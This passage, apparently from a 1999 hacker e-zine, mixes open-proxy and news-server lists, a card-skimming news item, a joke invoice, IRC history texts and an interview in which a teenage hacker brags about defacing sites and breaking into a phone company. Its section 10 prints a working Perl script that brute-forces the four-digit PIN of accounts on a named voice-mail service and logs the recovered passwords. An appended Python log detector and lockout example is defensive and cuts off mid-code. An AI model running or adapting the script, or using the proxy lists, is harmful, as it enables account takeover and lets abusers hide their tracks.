      RU                 adam.rosinkas.ru                      80      WWW / FTP                                                                                                                                                                       new
      SE    Varnamo      ns.varnamo.se                       8080      WWW / FTP                                                                                                                                                                       
      SG                 proxy1.tp.ac.sg                       80      WWW / FTP                                                                                                                                                                      new
      TR     Turnet      ankara3.turnet.net.tr               8080      WWW                                                                                                                                                                             
      TW     Golden      club.golden.com.tw                  8080      WWW      
      TW     IS          c1.h202052106.is.net.tw               80      WWW / FTP                                                                                                                                                          
      UK     poptel.net  softy.poptel.org.uk                 8080      WWW / FTP                                                                                                                                                                        
      UK                 proxy1.cdesd.k12.or.us                80      WWW / FTP                                                                   
      US     K12         stpauls.pvt.k12.al.us               8080      WWW / FTP                                                                   
      US                 cache.manistee-isd.k12.mi.us          80      WWW / FTP                                                                                                                                                                        
      YE     ?           sah3.ye                               80      WWW / FTP                                                                                                                                                                        
      ZA     M-Web       proxy-rnb2.mweb.co.za                 80      WWW / FTP                                                                                                                                                                        
      ZA     M-Web       proxy.cpt.mweb.co.za                  80      WWW / FTP                                                                                                                                                                        
      ZW     Cybergate   proxy.cybergate.co.zw               8080      WWW / FTP                                                                                                                                                                   down/busy ?
      ZW   Africaonline  proxy.africaonline.co.zw            8080      WWW / FTP
                                                                                                                                                                

      (C) lp
      http://www.lightspeed.de/irc4all/
      
      Telnettable Proxies
      ~~~~~~~~~~~~~~~~~~~
      

      
      @HWA
      
      
      
04.0  Cyberarmy Proxies, Accounts and Wingates etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      More goodies, although somewhat less reliable. These are from the lists at
      cyberarmy.com; beware phish, traps and plain bogus info mixed into the cruft.
      
      Unfortunately this section was unavailable in time for this issue due
      to server problems with cyberarmy.com. - Ed
      
      
      @HWA
      
      
      
05.0  Belgium: Security of Banksys compromised
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by Zym0t1c, an HWA correspondent
      Sorry no URL provided -Ed
        

      Belgium: Security of Banksys compromised
      
      Unknown persons have succeeded in compromising the security of Banksys, the
      company that controls pay terminals such as Bancontact and Mister Cash.  By
      stealing a C-Zam pay terminal at a gas station these unknown persons captured
      a list of credit cards and their codes.  With this info they were able to
      create fake credit cards.  By using special equipment they copied this info
      onto blank plastic cards.
      However, this story has two sides...  Two days before the C-Zam pay terminal
      was stolen, three hundred people had already lost ten thousand Belgian francs,
      due to the use of fake credit cards.  Youri Tolmatchov, spokesman of
      Banksys, thinks these unknown persons stole the terminal to make possible
      evidence disappear.
      The Public Prosecutor thinks these unknown persons may have used binoculars or
      cameras to monitor the credit card codes being used.  Then, creating the fake
      cards is rather simple.  Every good electronics store offers 'special
      equipment' like card copiers.  This trick was shown in a comic TV show where
      two guys were able to copy information from credit cards by using a copier and
      a camera.  The copies all worked perfectly.  By the way, this Youri
      Tolmatchov is sort of accusing the two TV guys of setting a 'bad example.'
      Banksys mentioned in a press conference the importance of using your secret
      code very discreetly.
      Incidents like these have already taken place in the past.  One remarkable
      incident was last year in France where a ghost terminal, forged by experts,
      displayed 'out of use' and at the same time copied the card's info.
      The next-generation credit cards are more secure because they're based on
      little computer chips which are very hard to copy.
      A question: why has Banksys not increased their security after that
      TV incident two years ago?  This is asking for trouble...
      
      @HWA
      
06.0  Public access mail servers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Note: Not all newsgroups are available on all servers
      
      
      Server Name                          Groups  Posting   
      mailserver.corvis.ru                   2405    Yes       
      malun1.mala.bc.ca                      5383    Yes       
      enak.skif.net                          6071    Yes       
      news.orconet.com                      17034    Yes
      valtan.sssp.mihara.hiroshima.jp        8541    Yes
      news.precisionet.net                  27820    Yes
      24.48.24.174                          21760    Yes
      informer.hixnet.co.za                 27127    Yes
      news.bezeqint.net                     32330    Yes
      223.176.100.5                         25887    Yes
      news.cyberrealm.net                   27827    Yes
      news.nasionet.net                     29285    Yes
      system.nari-china.com                 23611    Yes
      news.digicon.net                      26894    Yes                                                                   
      f400.n5020.z2.fidonet.org             2190     Yes (fido.* groups)
      magpie.cat.net.th                     29833    Yes
      news.ku.ac.th                         5315     No
      hc2.hci.net                           20455    Yes
      news.usr.com                          10463    Yes
      news.netzwerk2000.de                  54395    Yes
      transcend.btrd.ab.ca                  8052     Yes
      news1.simtel.ru                       17737    Yes
      linux5.provincia.ps.it                4840     No
      hq005is.seccom.com.my                 17462    Yes
      203.37.240.72                        24000+    Yes
      nntp.mmi.org                          12277    Yes
      206.97.174.98                         32461    Yes
      nntp1.sen.ca.gov                      27608    Yes
      fastnet-cache.disctronics.co.uk       22807    Yes
      delphi.bc.edu                          4062     No
      203.41.190.130                        22378    Yes
      news.ochin.on.ca                      20113    Yes
      linux.lanetixx.de                     7836     Yes
      205.253.48.9                          37121    Yes
      207.227.203.4                         45729     No
      octopussy.berlin.detecon.de           2585     Yes
      news.fcu.edu.tw                       15156     No
      208.128.255.6                         27820    Yes
      news.phys.uu.nl                       9052      No
      anode.phelpsd.com                     3754     Yes
      plato.devnull.tzo.net                23133     Yes
      promoting.net                        11406      No
      news.phys.uu.nl                       9212      No
      news.icq.com                            65     Yes (ICQ groups)
      mail.advis.de                        12812     Yes
      24.112.33.188                        31327     Yes
      206.243.175.108                      7554      Yes
      news.digitalfoundry.com              3102      Yes
      
      Plus many more, check out http://www.serverseekers.com/new.html for a complete
      list and more details. - Ed
      
      @HWA
      
07.0  Santa Claus about to lose his domain for nonpayment?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This was forwarded by another disgruntled elf (not the same one that lost his
      job at Santa's workshop last year who forwarded us his credit report)...seems
      Santa is feeling the crunch this year. 
      
      <snip>
      
                                                                       
                                                        Date   DEC-1-, 1999
                                                        Domain Name: Santasworkshop.com
                                                        Invoice Number: 313370
                                                        Amount Due: $70.00 US Dollars
                                                        
      This letter is being sent as a courtesy to advise that our records show payment
      for the domain name referenced above has not been received, surely a fat rich
      fuck like yourself can afford a domain name?. Our records show that the following
      person has been designated as the Billing Contact for the domain name in question.                                                        
      
      
      Elfadmin
      Admin, Elf
      Santa's Workshop
      POBOX H0H0H0
      
      North Pole
      Santa@santasworkshop.com
      
      If you believe that the payment and this notice may have crossed sleigh paths
      please verify the payment status by calling (888) 771-3000 from the U.S, Canada
      Puerto Rico and the U.S Virgin Islands. From other locations call (402) 496-9798
      
      If payment is not received within 10 days from the date of this notice, domain
      name service will be discontinued or one of your reindeer may be taken in lieu
      of payment.
      
      
      <snip>
      
      Poor Santa... dire straits again... - Ed
      
      @HWA
      
      
08.0  Interview with NFO (Nine Forty One Group)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      NFO is a Brazilian hacking group that has been around for nearly a year.
      I caught up with one of the members on IRC and he agreed to a short
      interview with me, so here's a peek into the mind of another hacker/cracker.
      
      Their website is : http://www.self-evident.com/nfo/ check it out, they
      also list a few recent hacks on the page...
      
      Interview start (Slightly edited to remove personal chit chat otherwise verbatim)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
      Session Start: Fri Dec 24 15:33:53 1999
      [15:33] <fickerguy> i'm nfo member
      [15:33] <fickerguy> www.self-evident.com/nfo
      <Cruciphux> you be on in a while?
      <Cruciphux> under this nick?
      [15:34] <fickerguy> now yes
      <Cruciphux> ok ttyiab gotta finish something up
      <Cruciphux> join #hwa.hax0r.news
      <Cruciphux> and idle
      <Cruciphux> if u want
      <Cruciphux> bbiab
      <Cruciphux> what does NFO stand for? just like it sounds? "info" ?
      [15:40] <fickerguy> no hack group
      [15:40] <fickerguy> we meet and hack
      <Cruciphux> what does NFO stand for though? the group name?
      <Cruciphux> can I interview you for the zine?
      [15:40] <fickerguy> nfo=ninefortyone
      [15:41] <fickerguy> now?
      <Cruciphux> sure won't take long
      [15:41] <fickerguy> ok
      [15:41] <fickerguy> start
      <Cruciphux> How long has NFO been around as a group and how many members do you have?
      [15:42] <fickerguy> 6 months, 6 members
      [15:42] <fickerguy> fickerguy, sysdenial, codak, thms, grafspee, vetesgirl
      <Cruciphux> sorry was interrupted
      <Cruciphux> do you deface websites or hack for access only?
      <Cruciphux> I see some sites listed on your page
      [15:46] <fickerguy> in the begging we were defacing a lot of brazilian government sites and some brazilians tv channels sites in brazil only cause we are brazilian except vetesgirl
      <Cruciphux> ok
      <Cruciphux> you are located in Brazil?
      [15:46] <fickerguy> but after globo tv channels we decided to don't deface websites anymore cause in brazil only stupids are defecing sites nowadays
      [15:47] <fickerguy> yes 5 of us
      <Cruciphux> what is your opinion on the 'scene' today?
      [15:47] <fickerguy> what do u mean? how r we on the scene?
      <Cruciphux> what do you think about the other people in the scene?
      <Cruciphux> general feelings
      [15:48] <fickerguy> they r all assholes
      [15:48] <fickerguy> as we are
      <Cruciphux> good answer
      <Cruciphux> ;)
      [15:48] <fickerguy> heh we make groups and code to change with them and that's all :)
      <Cruciphux> do you write your own exploits?
      [15:48] <fickerguy> no i don't
      <Cruciphux> would you call yourselves scriptkiddies then?
      [15:49] <fickerguy> i do tools to use them heh
      [15:49] <fickerguy> graf does
      <Cruciphux> ok
      [15:49] <fickerguy> graf writes exploit
      [15:49] <fickerguy> as vetes and sys lots of skills and backdoors
      [15:49] <fickerguy> skills/tools
      <Cruciphux> what are the ages of the members in the group?
      <Cruciphux> like oldest and youngest?
      [15:50] <fickerguy> i dunno exactly i think thms is 18, codak 16 or 17, graf and sys older, more than 23 and vetes i forgot heh more than 30 iam 15
      <Cruciphux> do you stay in contact off IRC or exclusively online?
      <Cruciphux> like telephone etc
      [15:51] <fickerguy> we 5 ( brazilians ) keep contact out of irc.. i mean telephone
      <Cruciphux> ok do you phreak too?
      [15:52] <fickerguy> no, all i do is that stuff with some wire in public phones and carding with some international phone cards
      <Cruciphux> have any of your group or yourself ever been raided or afraid you might be?
      [15:53] <fickerguy> i've been 
      [15:53] <fickerguy> i dunno about them
      <Cruciphux> by who?
      <Cruciphux> which agency?
      [15:53] <fickerguy> i hacked main computers in telemar ( brazilian telephone company ) and they come my home
      <Cruciphux> was the FBI involved? i've heard of the FBI acting outside of the US lately with Interpol in busts
      [15:54] <fickerguy> other time brazilian feds got me
      <Cruciphux> so Telephone Security personnel?
      [15:54] <fickerguy> no
      <Cruciphux> what were the consequences?
      [15:54] <fickerguy> with the feds i got in court and telemar we made an agreement
      <Cruciphux> cash settlement?
      [15:55] <fickerguy> in the court as i was too young and a lot of talk they just asked me to don't do it anymore
      [15:55] <fickerguy> and with telemar 
      <Cruciphux> lucky 
      [15:55] <fickerguy> i told them how i hacked them
      [15:55] <fickerguy> and they forgive me
      <Cruciphux> do you ever help out other admins after you've hacked their sites or patch holes you find?
      [15:56] <fickerguy> yes i did
      <Cruciphux> ok any last words  you'd like to say?
      [15:57] *** duro (duro@pm2-balt-98.qis.net) invites you to join #fawkerz
      [15:57] <fickerguy> don't be a cow just hacking like a cow eat a lot of bullshit networks like a universtity in the end of the hell, hack cool stuff
      <Cruciphux> ok anything else?
      <Cruciphux> any greets?
      <Cruciphux> :)
      [15:58] <fickerguy> greets to my mother, father, brother, nfo members and specialy for you HEHEH
      [15:58] <fickerguy> j/k
      <Cruciphux> hehe
      <Cruciphux> ok thanks for the interview i'll put it in issue #48
      [15:59] <fickerguy> ok thank u for the enjoying time
      [15:59] <fickerguy> i'll travel tonight
      [15:59] <fickerguy> we talk next week
      [15:59] <fickerguy> see ya
      <Cruciphux> cya
      Session Close: Fri Dec 24 15:59:42 1999
      
      @HWA
      
09.0  The history of IRC (Internet Relay Chat)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This is here coz I had a discussion on which IRC network came first and was
      told Dalnet was before EFnet, which I knew was wrong, but it got me to thinking:
      not many people know the real stories of the networks they are using, so here's
      a couple of files on EFNet and DALNET for your edification and enlightenment. - Ed
      
   ***NOTE! IF ANYONE has any info on BRC (Bitnet Relay Chat) I'd be VERY appreciative
      if you could email the info or point me in the direction of information on this
      predecessor to IRC mail to cruciphux@dok.org tnx!
      
      Source: http://www.the-project.org/history.html
      
          
      
      Early IRC history
      
      Dates by Ian, comments by Helen (this is a very rough cut)
      Send additions/corrections to frechett@colorado.edu
      
      summer 1988 - irc2.0 released
      
      this is Jarkko's tale of the releasing of irc:
      
      
      From jto@rieska.oulu.fi Fri Dec 10 18:23:37 1993
      Date: Fri, 10 Dec 93 14:46:17 +0200
      From: jto@rieska.oulu.fi (Jarkko Oikarinen)
      To: hrose@eff.org
      Subject: IRC History...
      Content-Length: 3752
      
      Included is a history of IRC as I wrote maybe 3 or 4 years ago.
      Hope it helps!
      
       I don't know if this helps much. I hope I remember things correctly and
       apologise to people whom I have left out and who deserved to be in here.
       
       I was working in the Department of Information Processing Science in
       University of Oulu during summer '88. I guess they didn't have much for me
       to do. I was administering the department's sun server, but it didn't
       take all my time. So I started doing a communications program, which was
       meant to make OuluBox (a Public Access BBS running on host tolsun.oulu.fi,
       administered by me) a little more usable. The purpose was to allow
       USENET News-kind of discussion and groups there in addition to real time
       discussions and other BBS related stuff.
       
       Jyrki Kuoppala (jkp@cs.hut.fi) had implemented rmsg program for sending
       messages to people on other machines. It didn't have the channel concept
       implemented (though it supported it), so it was mainly used for
       person-to-person communications.
       
       Another already existing simple multiuser chat program on OuluBox was
       MUT (MultiUser Talk), it was written by Jukka Pihl (pihl@rieska.oulu.fi).
       That program has a bad habit of not working properly, so in order to
       fix this, the first implemented thing of this BBS plan was IRC.
       
       The birthday of IRC was in August 1988. The exact date is unknown,
       at the end of the month anyways.
       
       Bitnet Relay Chat was a good inspiration for IRC. When IRC started
       occasionally having more than 10 users, I asked some friends of mine to
       start running irc servers in south Finland, mainly in Tampere University
       of Technology and Helsinki University of Technology. Some other
       universities soon followed. Markku Järvinen (mta@cc.tut.fi) improved
       the irc client (there was only one at that time) to support some emacs
       editing commands. At that time it was obvious that adding BBS like
       functions to the program was not a good idea, it's better to have
       one program for one purpose. So the BBS extension idea was given up
       and just IRC stayed.
       
       IRC was well spread in Finland. I contacted some friends of mine through
       BITNET Relay and asked if they would try this program. Internet connections
       did not yet work from Finland to other countries, so they could not
       connect to the Finnish network (which I suppose was the reason for them not
       being very enthusiastic about irc).
       
       Internet connections to the States started working (I don't anymore remember when).
       I answered to some news articles where people asked for multiuser chat
       programs. I didn't get replies.
       
       At MIT, there was the legendary ai.ai.mit.edu machine running ITS.
       I got an account there and learned to use it a little bit. Enough to
       know how to chat with people. From there I got the first IRC user outside
       Scandinavia, Mike Jacobs used IRC through OuluBox (he did not have account
       on any Unix machines).
       
       Through ai.ai.mit.edu I got to know Vijay Subramaniam (I hope I spelled
       that correctly :-). I had given IRC to him and not heard of him for some
       time. Then I got mail messages from Jeff Trim (used to be
       jtrim@orion.cair.du.edu, University of Denver, current address unknown)
       David Bleckmann (bleckmd@jacobs.cs.orst.edu) and Todd Ferguson
       (melvin@jacobs.cs.orst.edu, Oregon State University).
       Vijay had given IRC to them and they had started
       ircd on their machines (orion.cair.du.edu and jacobcs.cs.orst.edu,
       if I remember correctly) and wanted to connect to Finnish irc network.
       After that some other people started running IRC, and the number
       of servers grew quickly.
       
       The first IRC server (and still running) was tolsun.oulu.fi
       
       I have no idea of the latest one..
      
      
      Aug 88 - first irc server tolsun.oulu.fi
      89 - ircII released by Michael Sandrof (BigCheese)
      Mar 90 - 2.2msa4
      Jun 90 - 2.5beta ("+" named channels)
      Jun 90 - ircII 1.90a
      Jul 90 - 12 users on 38 servers
      Aug 90 - IRC splits into EFnet (Eris Free) and Anet (Anarchy)
      Sep 90 - 117 servers
      Sep 90 - 41 users 86 servers
      Nov 90 - version 2.6 released
      Dec 90 - ircII 2.0beta10
      late 90 - Darren Reed (Avalon) adds hash tables when IRC stops under load
      xxxx 91 - Troy Rollo (Troy) takes over ircII development
      Jan 91 - The Gulf war.. usage goes from peak 100 to peak 300
      Jan 91 - version 2.6.1 adds flow control..
      Feb 91 - bandwidth NSF stats record 8.8 Gigs for month of Feb
      Mar 91 - NSF is all T1
      Mar 91 - 2.6pre18 (famous for running on services.de long after 2.7 release)
      Mar 91 - bandwidth 200k/2 hours
      Mar 91 - 135 servers 69 us 66 non us
      Apr 91 - 240 users median
      Jun 91 - Cori booted off
      Jul 91 - The.PLAN
      Aug 91 - ircII 2.1.3
      Oct 91 - 399 users 120 servers 44 opers (hits 500)
      Nov 91 - ircII 2.1.5pre3
      Sum 92 - ICMP attacks (cert advisory July 92)
      Jan 93 - Matthew Green (phone) takes over ircII development
      xxxx 94 - irc.colorado.edu hits 1000 users 
      late 94 - IRC hits 5,000 users
      mid 95 - irc.escape.com hits 2000 users
      Oct 95 - IRC hits 15,000 users
      Feb 96 - Possibly largest channel ever. Id releases Qtest. #Quake sees 1556 users
      May 96 - Europe and the US EFnet splits into two separate networks as a result of a disagreement on whether the network should use TS or Nick Delay as a means to prevent nick collisions.
      
      Apr 97 - IRC hits 30,000 users
      Jun 97 - irc-e.primenet.com and irc1.phoenix.net both break 3000 clients
      Oct 97 - "smurf.c" - multi-broadcast ICMP attack posted to Bugtraq
      Denial of Service attacks on EFnet servers hit an all-time high
      Jan 98 - IRC hits 40,000 users
      Mar 98 - irc.blackened.com breaks 4000 clients
      Apr 98 - irc.blackened.com breaks 5000 clients
      May 98 - irc.blackened.com breaks 6000 clients 
      Jun 98 - irc.blackened.com breaks 7000 clients
      Sep 98 - irc.blackened.com breaks 8000 clients
      Feb 99 - irc.idle.net breaks 9000 clients
      Feb 99 - irc.idle.net breaks 10000 clients
      Feb 99 - IRC hits 50,000 users
      Jul 99 - irc.freei.net breaks 11000 clients
      Aug 99 - irc.concentric.net breaks 12000 clients
      Aug 99 - irc.concentric.net breaks 13000 clients
      Nov 99 - EFnet breaks 60,000 clients
      Nov 99 - irc.core.com breaks 14000 clients
      Dec 99 - irc.core.com breaks 15000 clients
      Dec 99 - irc.core.com breaks 16000 clients
      
      
      Need dates for
      - IRC gets 10 servers
      see my note above from Jarkko
      
      - IRC gets 100 servers
      
      the very first time it was done was May 1990, but it soon dropped down
      again. It was before the split and anyone could set up a server so we set
      up a few on machines at UC to bring the total up to 100 :-)
      [before EFnet/Anet]
      
      - IRC gets 200 servers  (it has been over 200.. but has dropped since)
      - irc2.4  (numeric only channels)
      
      here's a bit of history...
      
      I first started using irc in January or February of 1990. At the time the
      latest server revs were 2.2PL0 and 2.2PL1. msa and Chelsea Ashley Dyerman
      were working on the 2.3 release ... there was a disagreement between them
      about the copyrights. Chelsea had everything copyrighted by the IRCDC (IRC
      Development Consortium). People told her they didn't like that, it should
      be GPL'ed. She released 2.3alpha with those copyrights. Very few sites ran
      it as it didn't offer much over 2.2PL1.
      
      At the same time, msa was doing his own work. He added very handy things
      like /whowas, nick chase kill, wallops (later removed), and remote /away
      propagation. He had several releases, the most stable being 2.2msa4 and
      2.2msa9. 2.2msa10 eventually turned into 2.4 (2.3 was "tainted" by
      Chelsea).
      
      Jarkko came along and did a bit of cleanup on 2.4 (which was stable in and
      of itself) and released 2.4.1.
      
      - irc2.5
      
      Armin did 2.5 alpha, and then Jarkko took it over, with his idiotic 2.5+
      release. msa (I believe) did 2.5.1 ... then Tom Hopkins and some other BU
      folks (myself included) collaborated on 2.5.1.bu.10, possibly the most
      stable server version to date :-) No new features went into 2.5.1.bu.10
      (also called 2.5.2 in the docs, but it was never released as such), just
      bug fixes. I wish we did that nowadays :-)
      
      - irc2.6  + channels   (still have numerics)  # channels added later on
      
      Armin started the 2.6 release and then Avalon took it over. 
      
      - irc2.7  # channels replace + channels and numerics go away forever
      
      2.7 was a nice cleanup release. People tried to do things a bit more by
      the book. ircd was put through a saber C check (and bullied into
      compliance :-) 
      
      Bans were added to the server in 2.7. In 2.6 you could kick a user out but
      had to rekick or go +i to stop them from rejoining.
      
      - irc2.8  & channels.. 
      - irc2.9  + channels are back, sorta 
      
      Read the operlist archives on ftp.kei.com:/pub/irc/mailing-lists
      
      USBIC, planned in 1993, never passed. Again, more archives on
      ftp.kei.com:/pub/irc
      
      
      Again, I really suggest you look at the operlist and irclist archives on
      ftp.kei.com:/pub/irc/mailing-lists  -- it covers most of these issues.
      
      - WALLOPS removed
      
      Again, the dates should be in the archives
      
      - MODES added
      
      modes were added with + channels.       
      
      -=-
      
      Source: http://www.dalnet.com/
      
      
      DALNET History file    
      
      
      The History of IRC
      September 1999      
      
      
           Contents
      
           1. Some information on IRC
           2. Some information on DALnet
           3. Looking to the future
      
      
      
      
      1. Some Info on IRC

      IRC or Internet Relay Chat was originally written by Jarkko Oikarinen in 
      the year 1988. Since its birth in Finland, IRC is in use in over sixty 
      countries worldwide. IRC was originally designed as a replacement for a 
      program called "Talk". "What is IRC?" you may ask. IRC is a 
      multi-user chat system that connects 'servers' around the world by means 
      of a 'cable' of sorts. These servers form a gigantic web that allows you 
      to connect to a given server. You can then join 'chat rooms' or 'channels' 
      that don't really exist. They are virtual meeting halls of sorts. This 
      allows anyone with an internet connection to participate in live chat. IRC 
      is a constantly evolving machine. New changes are made to the IRCd 
      (Internet Relay Chat Daemon or server program) that make your IRC 
      experience all the more enjoyable. DALnet coders have recently created a 
      new IRCd, Bahamut, which enables servers to run faster and more 
      efficiently. You can get more information at http://www.bahamut.net. 

      During IRC's relatively short history it has quickly shown its superiority 
      over other chat systems like those owned by America On Line. This is 
      because of several reasons. Firstly, IRC is free. There is no charge to 
      use IRC or DALnet and there are no prerequisites to join. 

      Internet Relay Chat was propelled into the spotlight during the Gulf War 
      in 1991. During this period information was relayed from around the world. 
      Families could communicate from thousands of miles away. IRC was a meeting 
      place and an information clearinghouse for those who needed 
      information that was both up to date and reliable. 

      IRC has also been used during the Los Angeles Riots, the bombings in 
      Israel, the Presidential Elections in the United States, and of course, 
      Monica Lewinsky's deposition. Logs of these chats are available if you 
      click here. The DALnet IRC Network believes strongly in free speech 
      and freedom unless United States Federal Law or worldwide law is broken. 
      As will be stated below, IRC is supported by individuals who gain no 
      profit from their support of IRC (ISPs excepted). Therefore, many IRC 
      networks including DALnet do not allow the trading of illegal software or 
      'warez' or the so called 'kiddy-porn.' 

      At this time DALnet has about 40,000 users and forty-two servers 
      worldwide. It is important to remember that Internet Relay Chat is free 
      and is supported not by a conglomerate company but by a small group of 
      generous ISPs (Internet Service Providers), Admins (Server 
      Administrators) and IRCops (IRC Operators). None of these people are paid 
      for their support and generously provide a safe environment for you, the 
      user. 
      
      
      
      
      2. Information on DALnet

      The DALnet IRC Network was created as a replacement for the troubled EFnet 
      (Eris Free Net) and Undernet IRC Networks. EFnet has over fifty-thousand 
      users and eight thousand active channels. This is the largest of the IRC 
      Networks but it does have many troubling downsides. EFnet is also 
      one of the slowest networks. There is usually tremendous lag time because 
      of overwhelming users, bad server routing and connections and also 
      hacking. EFnet has hundreds of servers but has frequent NetSplits and thus 
      needed to be replaced by something more efficient. From this the Undernet 
      was born. 

      Undernet, though smaller, has servers in the United States, Canada, 
      Australia and in Europe. The Undernet attempted to do away with the high 
      consumption of bandwidth and channel chaos that was created by a large 
      number of users running bots (programs that perform a certain task). 
      These bots were usually intended to protect channels from takeovers or 
      were used to takeover channels themselves. The Undernet offered the 
      CService-a program that allowed users with W or X type bots to register 
      channels and protect them from troublemakers. The Undernet hit major 
      stumbling blocks in the areas of customer services and care, but the one 
      area of service that the Undernet excelled at was in innovations. The 
      Undernet allowed for new commands to be installed in the IRCd and new 
      channel modes to be used. It also allowed for greater security for 
      channels and channel modes as well as users. 

      The summer of the year 1994 dawned a new age for the users of Internet 
      Relay Chat. During this time the DALnet IRC Network was formed using a 
      modified version of the Undernet IRCd. This IRCd was edited chiefly by 
      Alexei "Lefler" Kosut. Some of the innovations included: global 
      WallOps (IRCop messages that can be seen by users who are +w (/mode 
      NickName +w)), longer nicknames, Q:Lined nicknames (nicknames that cannot 
      be used i.e. ChanServ, IRCop, NickServ, etc.), global K:Lines (ban of one 
      person or an entire domain from a server or the entire network), IRCop 
      only communications: GlobOps, +H mode showing that an IRCop is a HelpOp 
      also and many, many, many more features. DALnet's unique services were 
      originally coded in early 1995 by Brian "Morpher" Smith and allow users to 
      own nicknames, channels, send memos and do much, much more. These services 
      are superior to the X and W bots because they are omnipotent and invisibly 
      reside in every channel. Because of this channel bots are not needed. 
      ChanServ's automatic channel registration eliminates the lengthy processes 
      of Undernet while still being extremely easy to use and also very secure. 

      DALnet also provides users with the ability to 'own' one's NickName. The 
      /nickserv register PASSWORD command is all that is needed to own your own 
      nickname and ensure that it is always there for you when you come online 
      (Note: PASSWORD is your own password that you MUST remember or write 
      down for future use). DALnet users can also send Post-It type 'memos' to 
      each other if both users' nicknames are registered. More info on services 
      is available on their pages.

      Many servers have linked to and parted from DALnet in the few years that 
      it has existed. Some have left due to bandwidth problems, Internet Service 
      Provider problems, interpersonal problems, and other reasons. 

      

      3. Looking to the future

      DALnet continues to grow. Its user count has rocketed from around 30,000 
      at the beginning of 1999 to 45,000 during the Summer. DALnet's extensive 
      and well developed help system, whereby a person has a large number of 
      'recommended' channels and other resources at their fingertips, 
      continues to go from strength to strength. Among the current innovations 
      are freshly coded services which allow users to gain full potential from 
      nickname and channel registration and the new IRCd 
      (http://www.bahamut.net) to ensure a quick, worry-free connection. 
      DALnet's staff are still the pride of the network; users can join 
      #OperHelp for speedy assistance from an IRCop, and you'll always be 
      assured of a smiling, helping hand when you
      need it.
      
      
      
      
      Some information contributed by: nelgin, Sentinele, dalvenjah, 
      WebMaster, blofeld and the_saviour. 
      
      @HWA
      
10.0  Pagoo Internet voice MailBox by Loophole/HHP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Loophole
      
      #!/usr/bin/perl
      #
      #       (hhp) hhp-pagoo.pl (hhp)
      #       by: LoopHole of the hhp.
      #         http://hhp.hemp.net/
      #               6/25/99
      #
      # The (Pagoo Internet voice MailBox) exploit.
      # Available at http://www.pagoo.com/
      #
      # This exploit will extract the password to
      # the specified PagooID you specify.
      #
      # The vulnerability comes into play when you
      # connect to your UpdateForm thru signup.asp
      # which  requires  your  PagooID  and your 4
      # digit password.
      #
      # Nothing will prevent you from reconnecting
      # and trying  a  new  password from 0000  in
      # increments  of  1 till we reach 9999 which
      # is  the  highest  password  possible...  I
      # could  call  this  a  brute, but it always
      # 100%  of  the  time  will  get  the passwd
      # unlike a brute.
      #
      # Logs passwds to file: pagooids
      
      use IO::Socket;
      
      die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
      ($box) = (@ARGV);
      
      open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
      autoflush OUT 1;
      
      $host = "www.pagoo.com";
      autoflush STDOUT 1;
      
      sub parse
       {
        ($num) = @_;
        $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
      
        $socket = IO::Socket::INET->new(PeerAddr => $host,
                                        PeerPort => 80,
                                           Proto => "tcp") or die "Can't connect.\n";
      
        print $socket "GET $url\n";
        print "Trying password: $num of 9999.\n";
        while(<$socket>)
         {
              chomp;
              if(/Password invalid/)
               {
               last;
               }
              if(/First Name/)
               {
                print "PagooID password extracted...\n";
                print "PagooID: $box / Password: $num\n";
                print OUT "PagooID: $box / Password: $num\n";
                exit 0;
               }
      
          }
       }
      $num = '0000';
      parse $num;
      
      for($i = 0; $i <= 9999; $i++)
       {
        $num++;
        parse $num;
       }
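
      Added example (not part of Loophole's script or the original post): the
      script works because signup.asp accepts unlimited wrong guesses against a
      10,000-value PIN space. The Python below flags that pattern in constructed
      web-log lines and shows a per-ID lockout; the log format, addresses,
      PagooIDs and the PinGate class are assumptions made for illustration.

```python
import hmac
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

def sample_log():
    """Constructed Common Log Format lines; addresses and PagooIDs are invented."""
    fmt = ('{ip} - - [25/Jun/1999:10:00:{s:02d} +0000] "GET /asp/signup/signup.asp'
           '?Service=UpdateForm&PagooID={pid}&Password={pw}" 200 512')
    sweep = [fmt.format(ip="192.0.2.10", s=i, pid="5550001", pw=f"{i:04d}")
             for i in range(12)]          # 0000..0011 aimed at one ID
    owner = [fmt.format(ip="198.51.100.7", s=30, pid="5550002", pw="4821"),
             fmt.format(ip="198.51.100.7", s=41, pid="5550002", pw="4812")]
    return sweep + owner

# The protocol token is optional because the script sends a bare "GET <url>".
REQUEST_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "GET (\S+)(?: HTTP/[\d.]+)?" \d{3} ')

def find_pin_sweeps(lines, threshold=5):
    """Map PagooID -> number of distinct passwords tried, where >= threshold.

    Counting per target ID (not per client) still catches a sweep that is
    spread over several source addresses.
    """
    tried = defaultdict(set)
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.lower().endswith("/signup.asp"):
            continue
        query = parse_qs(target.query)
        if query.get("Service") != ["UpdateForm"]:
            continue
        pid = query.get("PagooID", [""])[0]
        pin = query.get("Password", [""])[0]
        if pid and pin:
            tried[pid].add(pin)
    return {pid: len(pins) for pid, pins in tried.items() if len(pins) >= threshold}

class PinGate:
    """Hypothetical server-side check: lock an ID after repeated wrong PINs."""

    def __init__(self, pins, max_failures=5, lock_seconds=900):
        self._pins = dict(pins)
        self._state = {}                  # pagoo_id -> (failures, locked_until)
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds

    def check(self, pagoo_id, pin, now):
        failures, locked_until = self._state.get(pagoo_id, (0, 0))
        if now < locked_until:
            return "locked"               # the guess is not evaluated at all
        expected = self._pins.get(pagoo_id)
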